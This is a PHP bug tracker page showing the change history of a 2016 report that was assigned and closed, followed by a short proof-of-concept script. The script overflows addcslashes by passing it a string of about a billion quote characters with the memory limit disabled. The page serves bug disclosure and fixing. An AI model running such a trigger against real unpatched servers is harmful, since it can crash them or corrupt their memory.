| 
        php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login | 
 PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits             
             [2016-06-16 04:50 UTC] stas@php.net
 
-Assigned To:
+Assigned To: stas
  [2016-06-16 04:50 UTC] stas@php.net
  [2016-06-21 06:49 UTC] stas@php.net
  [2016-06-21 06:49 UTC] stas@php.net
 
-Status: Assigned
+Status: Closed
  [2016-06-21 07:03 UTC] stas@php.net
  [2016-06-21 07:26 UTC] stas@php.net
  [2016-06-21 07:27 UTC] stas@php.net
  [2016-06-22 05:58 UTC] krakjoe@php.net
  | 
    |||||||||||||||||||||||||||
            
                 
                Copyright © 2001-2025 The PHP GroupAll rights reserved.  | 
        Last updated: Tue Nov 04 07:00:01 2025 UTC | 
Description: ------------ PoC: ``` <?php ini_set('memory_limit', -1); $str = str_repeat("'", 0xffffffff/4+1); $str = addcslashes($str, "'"); //$str = addslashes($str); var_dump(strlen($str)); ?> ```